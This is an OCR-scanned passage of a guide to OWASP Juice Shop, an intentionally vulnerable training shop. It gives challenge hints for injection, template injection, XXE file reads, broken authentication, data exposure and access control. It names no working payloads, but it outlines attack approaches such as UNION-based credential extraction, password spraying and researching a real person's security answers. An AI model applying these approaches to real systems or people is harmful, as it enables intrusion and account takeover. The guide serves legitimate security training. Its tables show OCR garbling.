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NoSQL databases provide looser consistency restrictions than traditional 
SQL databases. By requiring fewer relational constraints and consistency 
checks, NoSQL databases often offer performance and scaling benefits. 
Yet these databases are still potentially vulnerable to injection attacks, even 
if they aren't using the traditional SQL syntax. Because these NoSQL 
injection attacks may execute within a procedural language, rather than in 
the declarative SQL language, the potential impacts are greater than 
traditional SQL injection. 


NoSQL database calls are written in the application's programming 
language, a custom API call, or formatted according to a common 
convention (such as XML, JSON, LINQ, etc). Malicious input targeting 
those specifications may not trigger the primarily application sanitization 
checks. For example, filtering out common HTML special characters such 
as <> 8; will not prevent attacks against a JSON API, where special 
characters include /{}:. 


There are now over 150 NoSQL databases available for use within an 
application, providing APIs in a variety of languages and relationship 
models. Each offers different features and restrictions. Because there is not 
a common language between them, example injection code will not apply 
across all NoSQL databases. For this reason, anyone testing for NoSQL 
injection attacks will need to familiarize themselves with the syntax, data 
model, and underlying programming language in order to craft specific 
tests. 


NoSQL injection attacks may execute in different areas of an application 
than traditional SQL injection. Where SQL injection would execute within 
the database engine, NoSQL variants may execute during within the 
application layer or the database layer, depending on the NoSQL API used 
and data model. Typically NoSQL injection attacks will execute where the 


attack string is parsed, evaluated, or concatenated into a NoSQL API call. 


This challenge is about giving the server the chance to catch a breath by putting it 
to sleep for a while, making it essentially a stripped-down denial-of-service attack 
challenge. 


In a denial-of-service (DoS) attack, an attacker attempts to prevent 
legitimate users from accessing information or services. By targeting your 
computer and its network connection, or the computers and network of the 
sites you are trying to use, an attacker may be able to prevent you from 
accessing email, websites, online accounts (banking, etc.), or other 
services that rely on the affected computer. 


e As stated in the Architecture overview, OWASP Juice Shop uses a MongoDB 
derivate as its NoSQL database. 

e The categorization into the NoSQL Injection category totally gives away the 
expected attack vector for this challenge. Trying any others will not solve the 
challenge, even if they might yield the same result. 

e In particular, flooding the application with requests will not solve this 
challenge. That would probably just kill your server instance. 
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All your orders are belong to us 


This challenge is about retrieving all user's order data from the NoSQL DB ina 
single data extraction using an Injection attack. 


e This challenge requires a classic Injection attack. 

e Find an API endpoint with the intent of delivering a single order to the user 
and work with that. 

e Reading up on how MongoDB queries work is really helpful here. 


Update multiple product reviews at the same time 


The UI and API only offer ways to update individual product reviews. This 
challenge is about manipulating an update so that it will affect multiple reviews are 
the same time. 


e This challenge requires another classic Injection attack. 

e Take a close look on how the equivalent of UPDATE-statements in MongoDB 
work. 

e Itis also worth looking into how Query Operators work in MongoDB. 


Infect the server with juicy malware by abusing 
arbitrary command execution 


@ Please note that this challenge is not available when running the Juice Shop in 
either a Docker container or on a Heroku dyno! It is not possible to implement this 
vulnerability in a "safe" way without any risk of compromise of the underlying 
system. 


In this challenge you must exploit a Server-side Template Injection (SSTi) to 
"infect" the server with a specially crafted "malware". 


e You can find the juicy malware via a very obvious Google search or by 
stumbling into a very ill-placed quarantine folder with the necessary URLs in 
it. 

e Making the server download and execute the malware is key to solving this 
challenge. 

e For this challenge you do not have to reverse engineer the malware in any 
way. That will be required later to solve Request a hidden resource on server 
through server. 
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Server-side template injection occurs when user input is unsafely 
embedded into a server-side template, allowing users to inject template 
directives. Using malicious template directives, an attacker may be able to 
execute arbitrary code and take full control of the web server. 


The severity of this issue varies depending on the type of template engine 

being used. Template engines range from being trivial to almost impossible 
to exploit. The following steps should be used when attempting to develop 

an exploit: 


e Identify the type of template engine being used. 

e Review its documentation for basic syntax, security considerations, 
and built-in methods and variables. 

e Explore the template environment and map the attack surface. 

e Audit every exposed object and method. 


Template injection vulnerabilities can be very serious and can lead to 
complete compromise of the application's data and functionality, and often 
of the server that is hosting the application. It may also be possible to use 
the server as a platform for further attacks against other systems. On the 
other hand, some template injection vulnerabilities may pose no significant 
security risk. 


Retrieve a list of all user credentials via SQL Injection 


This challenge explains how a considerable number of companies were affected 
by data breaches without anyone breaking into the server room or sneaking out 
with a USB stick full of sensitive information. Given your application is vulnerable 
to a certain type of SQL Injection attacks, hackers can have the same effect while 
comfortably sitting in a café with free WiFi. 


e Try to find an endpoint where you can influence data being retrieved from the 
server. 

e Craft a unton seLect attack string to join data from another table into the 
original result. 

e You might have to tackle some query syntax issues step-by-step, basically 
hopping from one error to the next 

e As with Order the Christmas special offer of 2014 and Exfiltrate the entire DB 
schema definition via SQL Injection this cannot be achieved through the 
application frontend. 


https://www.owasp.org/index.php/Injection_Flaws e 
a https://www.owasp.org/index.php/Testing_ for NoSQL_injection e 
3 


. https:/Awww.us-cert.gov/ncas/tips/ST04-015 e 
a https://www.owasp.org/index.php/Blind_SQL_Injection e 


5 https://portswigger.net/kb/issues/00101080_server-side-template- 
injection e 
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Broken Authentication 


Challenges covered in this chapter 


Name Description Difficulty 
Reset the password of Bjoern's OWASP 
Bjoern's account via the Forgot Password ead 
Favorite Pet mechanism with the truthful answer to his 
security question. 
Change Change Bender's password into 
Bender's slurmCl4ssic without using SQL Injection kkk 
Password or Forgot Password. 
GDPR Data PTO P 
Erasure Log in with Chris' erased user account. kkk 
Log in with Bjoern's Gmail account 
Aey without previously changing his 
Fogn Bjoern password, applying SQL Injection, or Keak 
hacking his Google account. 
Exploit OAuth 2.0 to log in with the Chief 
Login CISO Information Security Officer's user kkk 
account. 
PassWord Log in with the administrator's user 
Strenath credentials without previously changing tok 
9 them or applying SQL Injection. 
Reset Reset Bender's password via the Forgot 
Bender's Password mechanism with the truthful kkk 
Password answer to his security question. 
Reset the password of Bjoern's internal 
Reset > 
Bioenis account via the Forgot Password E 
J mechanism with the truthful answer to his 
Password : A 
security question. 
Reset Jim's Reset Jim's password via the Forgot 
Password mechanism with the truthful XAK 
Password i . : 
answer to his security question. 
Solve the 2FA challenge for user 
Two Factor "wurstbrot". (Disabling, bypassing or 
Authentication overwriting his 2FA settings does not wit 


count as a solution) 


Reset the password of Bjoern's OWASP account via 
the Forgot Password mechanism 


This challenge is not about any technical vulnerability. Instead it is about finding 
out the answer to user Bjoern's chosen security question and use it to reset the 
password of his OWASP account. 
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Many website registrations use security questions for both password 
retrieval/reset and sign-in verification. Some also ask the same security 
questions when users call on the phone. Security questions are one 
method to verify the user and stop unauthorized access. But there are 
problems with security questions. Websites may use poor security 
questions that may have negative results: 


The user can’t accurately remember the answer or the answer changed, 
The question doesn’t work for the user, The question is not safe and could 
be discovered or guessed by others. It is essential that we use good 
questions. Good security questions meet five criteria. The answer to a good 
security question is: 


e Safe: cannot be guessed or researched 
e Stable: does not change over time 

e Memorable: can remember 

e Simple: is precise, easy, consistent 

e Many: has many possible answers 


It is difficult to find questions that meet all five criteria which means that 
some questions are good, some fair, and most are poor. In reality, there 
are few if any GOOD security questions. People share so much personal 
information on social media, blogs, and websites, that it is hard to find 
questions that meet the criteria above. In addition, many questions are not 
applicable to some people; for example, what is your oldest child’s 
nickname — but you don’t have a child.‘ 


e Hints to the answer to Bjoern's question can be found by looking him up on 
the Internet. 

e More precisely, Bjoern might have accidentally (@) doxxed himself by 
mentioning his security answer on at least one occasion where a camera was 
running. 

e Brute forcing the answer might be very well possible with a sufficiently 
extensive list of common pet names. 


Doxing (from dox, abbreviation of documents) or doxxing is the Internet- 
based practice of researching and broadcasting private or identifiable 
information (especially personally identifiable information) about an 
individual or organization. 


The methods employed to acquire this information include searching 
publicly available databases and social media websites (like Facebook), 
hacking, and social engineering. It is closely related to Internet vigilantism 
and hacktivism. 


Doxing may be carried out for various reasons, including to aid law 
enforcement, business analysis, risk analytics, extortion, coercion, inflicting 


harm, harassment, online shaming, and vigilante justice.2 


Change Bender's password into slurmCl4ssic without 
using SQL Injection or Forgot Password 
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This challenge can only be solved by changing the password of user Bender into 
slurmCl4ssic. Using any sort of SQL Injection will not solve the challenge, even if 
the password is successfully changed in the process. Beating Bender's security 
question to change his password also does not suffice to solve this challenge! 


e In previous releases of OWASP Juice Shop this challenge was wrongly 
accused of being based on Cross-Site Request Forgery). 

e It might also have been put into the Improper Input Validation category. 

e Bender's current password is so strong that brute force, rainbow table or 
guessing attacks will probably not work. 


A rainbow table is a precomputed table for reversing cryptographic hash 
functions, usually for cracking password hashes. Tables are usually used in 
recovering a plaintext password up to a certain length consisting of a 
limited set of characters. It is a practical example of a space/time trade-off, 
using less computer processing time and more storage than a brute-force 
attack which calculates a hash on every attempt, but more processing time 
and less storage than a simple lookup table with one entry per hash. Use of 


a key derivation function that employs a salt makes this attack infeasible.° 


Log in with Chris’ erased user account 


This challenge is about loggin in with the account of a user who previously 
insisted on his "right to be forgotten" in accordance with Art. 17 GDPR. 


e Trying out the Request Data Erasure functionality might be interesting, but 
cannot help you solve this challenge in real time. 

e lf you have solved the challenge Retrieve a list of all user credentials via SQL 
Injection you might have already retrieved some information about how the 
Juice Shop "deletes" users upon their request. 

e What the Juice Shop does here is totally incompliant with GDPR. Luckily a 
4% fine on a gross income of 0$ is still 0$. 


Log in with Bjoern's Gmail account 


The author of the OWASP Juice Shop (and of this book) was bold enough to link 
his Google account to the application. His account even ended up in the initial 
user records that are shipped with the Juice Shop for your hacking pleasure! 


If you do not see the Log in with Google button, do not despair! The hostname 
your Juice Shop is running on is simply not configured in the OAuth integration 
with Google. The OAuth-related challenges are still solvable! It might just take a 
little bit more detective work to find out how an OAuth login is handled. 


You can always use the official demo instance at http://demo.owasp-juice.shop to 
play with Google login and learn how it works there, then apply what you learned 
on your local instance. 


e There are essentially two ways to light up this challenge in green on the 
score board: 
o Incase you, dear reader, happen to be Bjoern Kimminich, just log in with 
your Google account to automatically solve this challenge! 
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Congratulations! 
o Everybody else might want to take detailed look into how the OAuth login 
with Google is implemented. 
e |t could bring you some insight to register with your own Google account and 
analyze closely what happens behind the scenes. 
e The security flaw behind this challenge is 100% Juice Shop's fault and 0% 
Google's. 


The unremarkable side note without hacking his Google account in the challenge 
description is not a joke. Please do not try to break into Bjoern's (or anyone 
else's) Google account. This would be a criminal act. 


Exploit OAuth 2.0 to log in with the CISO's user 
account 


You should expect a Chief Information Security Officer knows everything there is 
to know about password policies and best practices. The Juice Shop CISO took it 
even one step further and chose an incredibly long random password with all 
kinds of regular and special characters. Good luck brute forcing that! 


e The challenge description already suggests that the flaw is to be found 
somewhere in the OAuth 2.0 login process. 

e While it is also possible to use SQL Injection to log in as the CISO, this will 
not solve the challenge. 

e Try to utilize a broken convenience feature in your attack. 


Log in with the administrator's user credentials 
without previously changing them or applying SQL 
Injection 


You might have already solved this challenge along with Log in with the 
administrator's user account if you chose not to use SQL Injection. This challenge 
can only be solved if you use the original password of the administrator. If you 
changed the password previously, do not despair: The original password will 
always be accepted to make sure you can solve this challenge. 


e Guessing might work just fine. 

e If you harvested the admin's password hash, you can try to attack that. 

e In case you use some hacker tool, you can also go for a brute force attack 
using a generic password list 


Reset Bender's password via the Forgot Password 
mechanism 


This challenge is about finding the answer to user Bender's security question. It is 
probably slightly harder to find out than Jim's answer. 


e lf you have no idea who Bender is, please put down this book right now and 
watch the first episodes of Futurama before you come back. 
e Unexpectedly, Bender also chose to answer his chosen question truthfully. 
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Hints to the answer to Bender's question can be found in publicly available 
information on the Internet. 

If a seemingly correct answer is not accepted, you might just need to try 
some alternative spelling. 

Brute forcing the answer should be next to impossible. 


Reset the password of Bjoern's internal account via 
the Forgot Password mechanism 


This challenge is about finding the answer to the security question of Bjoern's 


internal user account bjoern@juice-sh.op . 


Other than with his OWASP account, Bjoern was a bit less careless with his 
choice of security and answer to his internal account. 

Bjoern chose to answer his chosen question truthfully but tried to make it 
harder for attackers by applying sort of a historical twist. 

Again, hints to the answer to Bjoern's question can be found by looking him 
up on the Internet. 

Brute forcing the answer should be next to impossible. 


Reset Jim's password via the Forgot Password 
mechanism 


This challenge is about finding the answer to user Jim's security question. 


The hardest part of this challenge is actually to find out who Jim actually is 
Jim picked one of the worst security questions and chose to answer it 
truthfully 

As Jim is a celebrity, the answer to his question is quite easy to find in 
publicly available information on the internet 

Even brute forcing the answer should be possible with the right kind of word 
list 


Solve the 2FA challenge for user "wurstbrot" 
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Multi-factor authentication (MFA) is an authentication method in which a 
computer user is granted access only after successfully presenting two or 
more pieces of evidence (or factors) to an authentication mechanism: 
knowledge (something the user and only the user knows), possession 
(something the user and only the user has), and inherence (something the 
user and only the user is). 


Two-factor authentication (also known as 2FA) is a type, or subset, of 
multi-factor authentication. It is a method of confirming users' claimed 
identities by using a combination of two different factors: 1) something they 
know, 2) something they have, or 3) something they are. 


A good example of two-factor authentication is the withdrawing of money 
from an ATM; only the correct combination of a bank card (something the 
user possesses) and a PIN (something the user knows) allows the 
transaction to be carried out. 


Two other examples are to supplement a user-controlled password with a 
one-time password (OTP) or code generated or received by an 
authenticator (e.g. a security token or smartphone) that only the user 
possesses.“ 


In the Juice Shop one customer was very security-aware and set up 2FA for his 
account. He goes by the hilarious username wurstbrot.® 


e As always, first learn how the feature under attack is used and behaves 
under normal conditions. 

e Make sure you understand how 2FA with TOTP (time-based one-time 
password) works and which part of it is the critically sensitive one. 

e Solving the challenge Retrieve a list of all user credentials via SQL Injection 
before tackling this one will definitely help. But it will not carry you all the way. 


i http://goodsecurityquestions.com © 


= https://en.wikipedia.org/wiki/Doxing e 
3 https://en.wikipedia.org/wiki/Rainbow_table e 
T https://en.wikipedia.org/wiki/Multi-factor_authentication © 


9 https://www.dict.cc/?s=wurstbrot + 
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Sensitive Data Exposure 


Challenges covered in this chapter 


Name 


Access Log 


Confidential 
Document 


Email Leak 


Forgotten 
Developer 
Backup 


Forgotten 
Sales 
Backup 


GDPR Data 
Theft 


Leaked 
Access 
Logs 


Leaked 
Unsafe 
Product 


Login Amy 


Login MC 
SafeSearch 


Misplaced 
Signature 
File 


Retrieve 
Blueprint 


Description 


Gain access to any access log file of the 
server. 


Access a confidential document. 


Perform an unwanted information disclosure 
by accessing data cross-domain. 


Access a developer's forgotten backup file. 


Access a salesman's forgotten backup file. 


Steal someone else's personal data without 
using Injection. 


Dumpster dive the Internet for a leaked 
password and log in to the original user 
account it belongs to. (Creating a new 
account with the same password does not 
qualify as a solution.) 


Identify an unsafe product that was removed 
from the shop and inform the shop which 
ingredients are dangerous. 


Log in with Amy's original user credentials. 
(This could take 93.83 billion trillion trillion 

centuries to brute force, but luckily she did 
not read the "One Important Final Note") 


Log in with MC SafeSearch's original user 
credentials without applying SQL Injection or 
any other bypass. 


Access a misplaced SIEM signature file. 


Deprive the shop of earnings by 
downloading the blueprint for one of its 
products. 


Difficulty 


KAAK 


* 


Kane 


0 Oe 84 


KKK 


0 Oe 8:4 


KI kk 


» Oe 8:4 


Kak 


wr 


0 oe 8:4 


Kan KK 


Gain access to any access log file of the server 
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An access log is a list of all the requests for individual files that people have 
requested from a Web site. These files will include the HTML files and their 
imbedded graphic images and any other associated files that get 
transmitted. The access log (Sometimes referred to as the "raw data") can 
be analyzed and summarized by another program. 


In general, an access log can be analyzed to tell you: 


The number of visitors (unique first-time requests) to a home page The 
origin of the visitors in terms of their associated server's domain name (for 
example, visitors from .edu, .com, and .gov sites and from the online 
services) How many requests for each page at the site, which can be 
presented with the pages with most requests listed first Usage patterns in 
terms of time of day, day of week, and seasonally Access log keepers and 
analyzers can be found as shareware on the Web or may come with a Web 


server. | 


The Juice Shop application server is writing access logs, which can contain 
interesting information that competitors might also be interested in. 


e Normally, server log files are written to disk on server side and are not 
accessible from the outside. 

e Which raises the question: Who would want a server access log to be 
accessible through a web application? 

e One particular file found in the folder you might already have found during the 
Access a confidential document challenge might give you an idea who is 
interested in such a public exposure. 

e Drilling down one level into the file system might not be sufficient. 


Access a confidential document 


Somewhere in the application you can find a file that contains sensitive 
information about some - potentially hostile - takeovers the Juice Shop top 
management has planned. 


e Analyze and tamper with links in the application that deliver a file directly. 
e The file you are looking for is not protected in any way. Once you found it you 
can also access it. 


Perform an unwanted information disclosure by 
accessing data cross-domain 


Somewhere in the application there is an API endpoint which will allow data to be 
accessed cross domain. Usually the same-origin policy would prevent this but this 
endpoint has a special feature enabled which will allow cross domain access 
under certain circumstances. 


e Try to find and attack an endpoint that responds with user information. SQL 
Injection is not the solution here. 

e What ways are there to access data from a web application cross-domain? 

e This challenge uses an old way which is no longer recommended. 
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Access a developer's forgotten backup file 


During an emergency incident and the hotfix that followed, a developer 
accidentally pasted an application configuration file into the wrong place. 
Downloading this file will not only solve the Access a developer's forgotten 
backup file challenge but might also prove crucial in several other challenges later 
on. 


e Analyze and tamper with links in the application that deliver a file directly. 

e The file is not directly accessible because a security mechanism prevents 
access to it. 

e You need to trick the security mechanism into thinking that the file has a valid 
file type. 

e For this challenge there is only one approach to pull this trick. 


Access a salesman's forgotten backup file 


A salesperson as accidentally uploaded a list of (by now outdated) coupon codes 
to the application. Downloading this file will not only solve the Access a 
salesman's forgotten backup file challenge but might also prove useful in another 
challenge later on. 


e Analyze and tamper with links in the application that deliver a file directly. 

e The file is not directly accessible because a security mechanism prevents 
access to it. 

e You need to trick the security mechanism into thinking that the file has a valid 
file type. 


Steal someone else's personal data without using 
Injection 


In order to comply with GDPR, the Juice Shop offers a Request Data Export 
function for its registered customers. It is possible to exploit a flaw in the feature to 
retrieve more data than intended. Injection attacks will not count to solve this one. 


e You should not try to steal data from a "vanilla" user who never even ordered 
something at the shop. 

e As everything about this data export functionality happens on the server-side, 
it won't be possible to just tamper with some HTTP requests to solve this 
challenge. 

e Inspecting various server responses which contain user-specific data might 
give you a clue about the mistake the developers made. 


Dumpster dive the Internet for a leaked password and 
log in to the original user account it belongs to 


The company behind the Juice Shop failed miserably at implementing any data 
loss prevention measures for itself. This challenge simulates a seemingly 
harmless data leak that - upon closer inspection - subsequently allows an account 
takeover. 
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Data loss prevention software detects potential data breaches/data ex- 
filtration transmissions and prevents them by monitoring, detecting and 
blocking sensitive data while in use (endpoint actions), in motion (network 
traffic), and at rest (data storage). 


The terms "data loss" and "data leak" are related and are often used 
interchangeably. Data loss incidents turn into data leak incidents in cases 
where media containing sensitive information is lost and subsequently 
acquired by an unauthorized party. However, a data leak is possible without 
losing the data on the originating side. Other terms associated with data 
leakage prevention are information leak detection and prevention (ILDP), 
information leak prevention (ILP), content monitoring and filtering (CMF), 
information protection and control (IPC) and extrusion prevention system 
(EPS), as opposed to intrusion prevention system. 


As the challenge name implies, your task is to find some leaked access logs 
which happen to have a fairly common format. 

A very popular help platform for developers might contain breadcrumbs 
towards solving this challenge 

The actual log file was copied & paste onto a platform often used to share 
data quickly with externals or even just internal peers. 

Once you found and harvested the important piece of information from the 
log, you could employ a technique called Password Spraying to solve this 
challenge. 


Password spraying refers to the attack method that takes a large number of 
usernames and loops them with a single password. We can use multiple 
iterations using a number of different passwords, but the number of 
passwords attempted is usually low when compared to the number of users 
attempted. This method avoids password lockouts, and it is often more 


effective at uncovering weak passwords than targeting specific users.” 


Identify an unsafe product that was removed from the 
shop and inform the shop which ingredients are 
dangerous 


Similar to Dumpster dive the Internet for a leaked password and log in to the 


original user account it belongs to this challenge further highlights the risks from a 
lack of data loss prevention. 


You must first identify the "unsafe product" which ist not available any more in 
the shop. 

Solving the Order the Christmas special offer of 2014 challenge might give it 
to you as by-catch. 

The actual data you need to solve this challenge was leaked on the same 
platform that was involved in Dumpster dive the Internet for a leaked 
password and log in to the original user account it belongs to 

Google is a particularly good accomplice in this challenge. 


Log in with Amy's original user credentials 
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This challenge is similar to Log in with the administrators user credentials without 
previously changing them or applying SQL Injection in the sense that only using 
her original credentials will work as a challenge solutions. 





e As with so many other characters from Futurama this challenge is of course 
about logging in as Amy from that show. In the picture above you see her 
together with her alien husband Kif. 

e The challenge description contains a few sentences which give away some 
information how Amy decided to strengthen her password. 

e Obviously, Amy - being a little dimwitted - did not put nearly enough effort and 
creativity into the password selection process. 


Log in with MC SafeSearch's original user credentials 


Another user login challenge where only the original password is accepted as a 
solution. Employing SQL Injection or other attacks does not count. 


e MC SafeSearch is a rapper who produced the song "Protect Ya' Passwordz" 
which explains password & sensitive data protection very nicely. 

e After watching the music video of this song, you should agree that even *+* 
is a slightly exaggerated difficulty rating for this challenge. 


MC SAFESEARCH feåt. BOBBY SECRETS 
“PROTECT YA’ PASSWORDZ” 
USERNAME: MCSAFES PRODUCTIONS 





Rapper Who Is Very Concerned With Password Security 


1,255,120 views 
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Access a misplaced SIEM signature file. 


Security information and event management (SIEM) technology supports 
threat detection and security incident response through the real-time 
collection and historical analysis of security events from a wide variety of 
event and contextual data sources. It also supports compliance reporting 
and incident investigation through analysis of historical data from these 
sources. The core capabilities of SIEM technology are a broad scope of 
event collection and the ability to correlate and analyze events across 


disparate sources.° 


The misplaced signature file is actually a rule file for Sigma, a generic signature 
format for SIEM systems: 


Sigma is a generic and open signature format that allows you to describe 
relevant log events in a straight forward manner. The rule format is very 
flexible, easy to write and applicable to any type of log file. The main 
purpose of this project is to provide a structured form in which researchers 
or analysts can describe their once developed detection methods and make 
them shareable with others. 


Sigma is for log files what Snort is for network traffic and YARA is for files.4 


e |f you solved one of the other four file access challenges, you already know 
where the SIEM signature file is located 
e Simply reuse the trick that already worked for the files above 


Deprive the shop of earnings by downloading the 
blueprint for one of its products 


Why waste money for a product when you can just as well get your hands on its 
blueprint in order to make it yourself? 


e The product you might want to give a closer look is the OWASP Juice Shop 
Logo (3D-printed) 

e For your inconvenience the blueprint was not misplaced into the same place 
like so many others forgotten files covered in this chapter 


© /f you are running the Juice Shop with a custom theme and product inventory, 
the product to inspect will be a different one. The tooltip on the Score Board will 
tell you which one to look into. 


i https://searchsecurity.techtarget.com/definition/access-log e 


a https://en.wikipedia.org/wiki/Data_loss_prevention_software + 


3 https://www.gartner.com/it-glossary/security-information-and-event- 
management-siem/ e 


id https://github.com/Neo23x0/sigma#what-is-sigma e 


2. https://resources.infosecinstitute.com/password-spraying/ © 
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XML External Entities (XXE) 


An XML External Entity attack is a type of attack against an application that 
parses XML input. This attack occurs when XML input containing a 
reference to an external entity is processed by a weakly configured XML 
parser. This attack may lead to the disclosure of confidential data, denial of 
service, server side request forgery, port scanning from the perspective of 
the machine where the parser is located, and other system impacts. 


The XML 1.0 standard defines the structure of an XML document. The 
standard defines a concept called an entity, which is a storage unit of some 
type. There are a few different types of entities, external general/parameter 
parsed entity often shortened to external entity, that can access local or 
remote content via a declared system identifier. The system identifier is 
assumed to be a URI that can be dereferenced (accessed) by the XML 
processor when processing the entity. The XML processor then replaces 
occurrences of the named external entity with the contents dereferenced by 
the system identifier. If the system identifier contains tainted data and the 
XML processor dereferences this tainted data, the XML processor may 
disclose confidential information normally not accessible by the application. 
Similar attack vectors apply the usage of external DTDs, external 
stylesheets, external schemas, etc. which, when included, allow similar 
external resource inclusion style attacks. 


Attacks can include disclosing local files, which may contain sensitive data 
such as passwords or private user data, using file: schemes or relative 
paths in the system identifier. Since the attack occurs relative to the 
application processing the XML document, an attacker may use this trusted 
application to pivot to other internal systems, possibly disclosing other 
internal content via http(s) requests or launching a CSRF attack to any 
unprotected internal services. In some situations, an XML processor library 
that is vulnerable to client-side memory corruption issues may be exploited 
by dereferencing a malicious URI, possibly allowing arbitrary code 
execution under the application account. Other attacks can access local 
resources that may not stop returning data, possibly impacting application 
availability if too many threads or processes are not released. 


Note that the application does not need to explicitly return the response to 
the attacker for it to be vulnerable to information disclosures. An attacker 
can leverage DNS information to exfiltrate data through subdomain names 
to a DNS server that he/she controls. 


Challenges covered in this chapter 
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Name Description Difficulty 


XXE Data Retrieve the content of c:\windows\system. ini Jo 
Access Or /etc/passwd from the server. 
XXE DoS Give the server something to chew on for TE 


quite a while. 


@ Please note that both XXE challenges described below are not available when 
running the Juice Shop in either a Docker container or on a Heroku dyno! Certain 
aggressive attacks against the underlying XML parser caused the process to die 
from "Segmentation Fault" ( segfault ) errors. This happens despite the fact that 
the parsing actually happens in a sandbox with a timeout. While it is unfortunate 
to not have XXE challenges on containerized environments, this somewhat nicely 
shows how incredibly dangerous ill-configured XML parsers actually are. 


Retrieve the content of C:\Windows\system.ini or 
/etc/passwd from the server 


In this challenge you are tasked to disclose a local file from the server the Juice 
Shop backend is hosted on. 


e You already found the leverage point for this challenge if you solved Use a 
deprecated B2B interface that was not properly shut down. 

e This challenge sounds a lot harder than it actually is, which amplifies how 
bad the underlying vulnerability is. 

e Doing some research on typical XEE attack patterns basically gives away the 
solution for free. 


Give the server something to chew on for quite a 
while 


Similar to Let the server sleep for some time this challenge is about performing a 
stripped-down denial-of-service attack. But this one is going against an entirely 
different leverage point. 


e The leverage point for this is obviously the same as for the XXE Tier 1 
challenge above. 

e You can only solve this challenge by keeping the server busy for >2sec with 
your attack. 

e The effectiveness of attack payloads for this challenge might depend on the 
operating system the Juice Shop is running on. 


1 
https://www.owasp.org/index.php/XML_External_Entity_(XXE)_ Processing 





2 
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Improper Input Validation 


When software does not validate input properly, an attacker is able to craft 
the input in a form that is not expected by the rest of the application. This 
will lead to parts of the system receiving unintended input, which may result 
in altered control flow, arbitrary control of a resource, or arbitrary code 
execution. | 


Challenges covered in this chapter 


Name Description Difficulty 

Admin Register as a user with administrator ee 

Registration privileges. 

Expired Successfully redeem an expired 

Coupon campaign coupon code. weak 

Payback Time Place an order that makes you rich. tik 

Repetitive Follow the DRY principle while a 

Registration registering a user. 

Upload Size Upload a file larger than 100 kB. tk 
Upload a file that has no .pdf or .zip 

Wales Wise extension. Kak 

Zero Stars Give a devastating zero-star feedback to ve 


the store. 


Register as a user with administrator privileges 


The Juice Shop does not bother to separate administrative functionality into a 
deployment unit of its own. Instead, the cheapest solution was chosen by simply 
leaving then admin features in the web shop itself and (allegedly) demanding a 
higher level of access to use them. 


e Register as an ordinary user to learn what API endpoints are involved in this 
use case 

e Think of the simplest possible implementations of a distinction between 
regular users and administrators 


Successfully redeem an expired campaign coupon 
code 


Apart from the monthly coupon codes found on Twitter the Juice Shop also 
offered some seasonal special campaign at least once. 


e Look for clues about the past campaign or holiday event somewhere in the 
application 
e Solving this challenge does not require actual time traveling 
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Place an order that makes you rich 


It is probably every web shop's nightmare that customers might figure out away to 
receive money instead of paying for their purchase. 


e You literally need to make the shop owe you any amount of money 
e Investigate the shopping basket closely to understand how it prevents you 
from creating orders that would fulfil the challenge 


Follow the DRY principle while registering a user 
The DRY (Don't Repeat Yourself) Principle states: 


Every piece of knowledge must have a single, unambiguous, 
authoritative representation within a system. 


e The obvious repetition in the User Registration form is the Repeat Password 
field 

e Try to register with either an empty or different value in Repeat Password 

e You can solve this challenge by cleverly interacting with the UI or bypassing it 
altogether 


Upload a file larger than 100 kB 


The Juice Shop offers its customers the chance to complain about an order that 
left them unsatisfied. One of the juice bottles might have leaked during transport 
or maybe the shipment was just two weeks late. To prove their claim, customers 
are supposed to attach their order confirmation document to the online complaint. 
To prevent abuse of this functionality, the application only allows file uploads of 
100 kB or less. 


e First you should try to understand how the file upload is actually handled on 
the client and server side 

e With this understanding you need to find a "weak spot" in the right place and 
have to craft an exploit for it 


Upload a file that has no .pdf or .zip extension 


In addition to the maximum file size, the Juice Shop also verifies that the 
uploaded file is actually a PDF. All other file types are rejected. 


e |f you solved the Upload a file larger than 100 kB challenge, you should try to 
apply the same solution here 


Give a devastating zero-star feedback to the store 


You might have realized that it is not possible to submit customer feedback on the 
Contact Us screen until you entered a comment and selected a star rating from 1 
to 5. This challenge is about tricking the application into accepting a feedback with 
0 stars. 
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e Before you invest time bypassing the API, you might want to play around with 
the UI a bit 


1 https://cwe.mitre.org/data/definitions/20.html + 
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Broken Access Control 


Most computer systems are designed for use with multiple users. Privileges 


mean what a user is permitted to do. Common privileges include viewing 


and editing files, or modifying system files. 


Privilege escalation means a user receives privileges they are not entitled 


to. These privileges can be used to delete files, view private information, or 


install unwanted programs such as viruses. It usually occurs when a 


system has a bug that allows security to be bypassed or, alternatively, has 


flawed design assumptions about how it will be used. Privilege escalation 


occurs in two forms: 


e Vertical privilege escalation, also known as privilege elevation, where a 


lower privilege user or application accesses functions or content 


reserved for higher privilege users or applications (e.g. Internet 


Banking users can access site administrative functions or the 


password for a smartphone can be bypassed.) 


e Horizontal privilege escalation, where a normal user accesses 


functions or content reserved for other normal users (e.g. Internet 


Banking User A accesses the Internet bank account of User By! 


Challenges covered in this chapter 


Name 


Admin 
Section 


Easter 
Egg 


Five-Star 
Feedback 


Forged 
Feedback 


Forged 
Review 


Manipulate 
Basket 


Product 
Tampering 


SSRF 


View 
Basket 


Description 


Access the administration section of the 
store. 


Find the hidden easter egg. 


Get rid of all 5-star customer feedback. 


Post some feedback in another users 
name. 


Post a product review as another user or 
edit any user's existing review. 


Put an additional product into another 
user's shopping basket. 


Change the href of the link within the 
OWASP SSL Advanced Forensic Tool (O- 
Saft) product description into 
https://owasp.slack.com. 


Request a hidden resource on server 
through server. 


View another user's shopping basket. 
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Difficulty 


Kn 


KARK 


Kn 


Kak 


Kak 


Kak 


Kak 


Kat 


Kn 


Access the administration section of the store 


Just like the score board, the admin section was not part of your "happy path" tour 
because there seems to be no link to that section either. In case you were already 
logged in with the administrator account you might have noticed that not even for 
him there is a corresponding option available in the main menu. 


e Knowing it exists, you can simply guess what URL the admin section might 
have. 

e Alternatively, you can try to find a reference or clue within the parts of the 
application that are not usually visible in the browser 

e lItis probably just slightly harder to find and gain access to than the score 
board link 

e There is some access control in place, but there are at least three ways to 
bypass it. 


Find the hidden easter egg 


An Easter egg is an intentional inside joke, hidden message, or feature in 
an interactive work such as a computer program, video game or DVD menu 
screen. The name is used to evoke the idea of a traditional Easter egg 

2 
hunt. 


e If you solved one of the other four file access challenges, you already know 
where the easter egg is located 
e Simply reuse the trick that already worked for the files above 


When you open the easter egg file, you might be a little disappointed, as the 
developers taunt you about not having found the real easter egg! Of course 
finding that is a follow-up challenge to this one. 


Get rid of all 5-star customer feedback 


If you successfully solved above admin section challenge deleting the 5-star 
feedback is very easy. 


e Nothing happens when you try to delete feedback entries? Check the 
JavaScript console for errors! 


Post some feedback in another users name 


The Juice Shop allows users to provide general feedback including a star rating 
